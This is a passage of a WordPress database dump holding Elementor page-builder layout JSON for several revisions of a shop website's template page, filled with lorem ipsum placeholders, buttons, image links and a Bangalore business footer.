mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8453,1481,'_elementor_page_assets','a:0:{}'),(8455,1482,'_elementor_edit_mode','builder'),(8456,1482,'_elementor_template_type','wp-page'),(8457,1482,'_elementor_version','3.7.7'),(8458,1482,'_wp_page_template','elementor_canvas'),(8459,1482,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8460,1482,'_elementor_page_assets','a:0:{}'),(8463,1483,'_elementor_edit_mode','builder'),(8464,1483,'_elementor_template_type','wp-page'),(8465,1483,'_elementor_version','3.7.7'),(8466,1483,'_wp_page_template','elementor_canvas'),(8467,1483,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know 